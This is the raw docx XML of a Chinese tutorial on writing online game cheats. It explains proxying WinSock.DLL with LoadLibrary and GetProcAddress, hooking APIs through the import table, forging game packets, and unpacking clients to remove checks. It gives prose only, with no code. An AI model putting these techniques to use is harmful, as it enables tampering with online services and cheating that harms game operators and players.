          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　首先我们要替换</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>WinSock.DLL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或者</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>WinSock32.DLL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，我们写的替换函数要和原来的函数一致才行，就是说它的函数输出什么样的，我们也要输出什么样子的函数，而且参数，参数顺序都要一样才行，然后在我们的函数里面调用真正的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>WinSock32.DLL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>里面的函数就可以了。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRPr="00780E17" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">　　首先：我们可以替换动态库到系统路径。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　其次：我们应用程序启动的时候可以加载原有的动态库，用这个函数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>LoadLibary</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后定位函数入口用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>GetProcAddress</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数获得每个真正</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Socket</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数的入口地址。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　当游戏进行的时候它会调用我们的动态库，然后从我们的动态库中处理完毕后才跳转到真正动态库的函数地址，这样我们就可以在里面处理自己的数据了，应该是一切数据。呵呵，兴奋吧，拦截了数据包我们还要分析之后才能进行正确的应答，不要以为这样工作就完成了，还早呢。等分析完毕以后我们还要仿真应答机制来和服务器通信，一个不小心就会被封号。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　分析数据才是工作量的来源呢，游戏每次升级有可能加密方式会有所改变，因此我们写外挂的人都是亡命之徒啊，被人愚弄了还不知道。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">2.4 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>截获</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">API </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　上面的技术如果可以灵活运用的话我们就不用截获</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数了，其实这种技术是一种补充技术。比如我们需要截获</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Socket</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>以外的函数作为我们的用途，我们就要用这个技术了，其实我们也可以用它直接拦截在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Socket</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中的函数，这样更直接。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　现在拦截</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的教程到处都是，我就不列举了，我用的比较习惯的方法是根据输入节进行拦截的，这个方法可以用到任何一种操作系统上，比如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows 98/2000</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>等，有些方法不是跨平台的，我不建议使用。这个技术大家可以参考《</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>核心编程》里面的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>545</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>页开始的内容来学习，如果是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Win98</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>系统可以用“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>系统奥秘”那个最后一章来学习。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>goodmorning</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>收集</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>整理</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>请勿删除</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>网络游戏外挂编写基础①</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>要想在修改游戏中做到百战百胜，是需要相当丰富的计算机知识的。有很多计算机高手就是从玩游戏，修改游戏中，逐步对计算机产生浓厚的兴趣，逐步成长起来的。不要在羡慕别人能够做到的，因为别人能够做的你也能够！我相信你们看了本教程后，会对游戏有一个全新的认识，呵呵，因为我是个好老师！（别拿鸡蛋砸我呀，救命啊！</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 xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　不过要想从修改游戏中学到知识，增加自己的计算机水平，可不能只是靠修改游戏呀！</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>要知道，修改游戏只是一个验证你对你所了解的某些计算机知识的理解程度的场所，只能给你一些发现问题、解决问题的机会，只能起到帮助你提高学习计算机的兴趣的作用，而决不是学习计算机的捷径。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　一：什么叫外挂？</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　现在的网络游戏多是基于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Internet</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>上客户／服务器模式，服务端程序运行在游戏服务器上，游戏的设计者在其中创造一个庞大的游戏空间，各地的玩家可以通过运行客户端程序同时登录到游戏中。简单地说，网络游戏实际上就是由游戏开发商提供一个游戏环境，而玩家们就是在这个环境中相对自由和开放地进行游戏操作。那么既然在网络游戏中有了服务器这个概念，我们以前传统的修改游戏方法就显得无能为力了。记得我们在单机版的游戏中，随心所欲地通过内存搜索来修改角色的各种属性，这在网络游戏中就没有任何用处了。因为我们在网络游戏中所扮演角色的各种属性及各种重要资料都存放在服务器上，在我们自己机器上（客户端）只是显示角色的状态，所以通过修改客户端内存里有关角色的各种属性是不切实际的。那么是否我们就没有办法在网络游戏中达到我们修改的目的？回答是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>否</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　我们知道</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Internet</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>客户／服务器模式的通讯一般采用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>TCP/IP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通信协议，数据交换是通过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据包的传输来实现的，一般来说我们客户端向服务器发出某些请求，比如移动、战斗等指令都是通过封包的形式和服务器交换数据。那么我们把本地发出消息称为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SEND</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，意思就是发送数据，服务器收到我们</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SEND</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的消息后，会按照既定的程序把有关的信息反馈给客户端，比如，移动的坐标，战斗的类型。那</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>么我们把客户端收到服务器发来的有关消息称为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>RECV</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。知道了这个道理，接下来我们要做的工作就是分析客户端和服务器之间往来的数据（也就是封包），这样我们就可以提取到对我们有用的数据进行修改，然后模拟服务器发给客户端，或者模拟客户端发送给服务器，这样就可以实现我们修改游戏的目的了。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　目前除了修改游戏封包来实现修改游戏的目的，我们也可以修改客户端的有关程序来达到我们的要求。我们知道目前各个服务器的运算能力是有限的，特别在游戏中，游戏服务器要计算游戏中所有玩家的状况几乎是不可能的，所以有一些运算还是要依靠我们客户端来完成，这样又给了我们修改游戏提供了一些便利。比如我们可以通过将客户端程序脱壳来发现一些程序的判断分支，通过跟踪调试我们可以把一些对我们不利的判断去掉，以此来满足我们修改游戏的需求。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在下几个章节中，我们将给大家讲述封包的概念，和修改跟踪客户端的有关知识。大家准备好了吗？</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　游戏数据格式和存储：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　在进行我们的工作之前，我们需要掌握一些关于计算机中储存数据方式的知识和游戏中储存数据的特点。本章节是提供给菜鸟级的玩家看的，如果你是高手就可以跳过了，如果，你想成为无坚不摧的剑客，那么，这些东西就会花掉你一些时间；如果，你只想作个江湖的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>游客的话，那么这些东西，了解与否无关紧要。是作剑客，还是作游客，你选择吧！</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　现在我们开始！首先，你要知道游戏中储存数据的几种格式，这几种格式是：字节</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(BYTE)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、字</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(WORD)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和双字</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(DOUBLE WORD)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，或者说是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>位、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>16</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>位和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>32</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>位储存方式。字节也就是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>位方式能储存</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>0~255</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的数字；字或说是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>16</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>位储存方式能储存</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>0~65535</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的数；双字即</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>32</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>位方式能储存</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>0~4294967295</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的数。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　为何要了解这些知识呢？在游戏中各种参数的最大值是不同的，有些可能</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>100</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>左右就够了，比如，金庸群侠传中的角色的等级、随机遇敌个数等等。而有些却需要大于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>255</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>甚至大于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>65535</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，象金庸群侠传中角色的金钱值可达到数百万。所以，在游戏中各种不同的数据的类型是不一样的。在我们修改游戏时需要寻找准备修改的数据的封包，在这种时候，正确判断数据的类型是迅速找到正确地址的重要条件。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　在计算机中数据以字节为基本的储存单位，每个字节被赋予一个编号，以确定各自的位置。这个编号我们就称为地址。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　在需要用到字或双字时，计算机用连续的两个字节来组成一个字，连续的两个字组成一个双字。而一个字或双字的地址就是它们的低位字节的地址。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>现在我们常用的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows 9x</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>操作系统中，地址是用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>32</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>位的二进制数表示的。而在平时我们用到内存地址时，总是用一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>位的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>16</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进制数来表示它。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　二进制和十六进制又是怎样一回事呢？</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
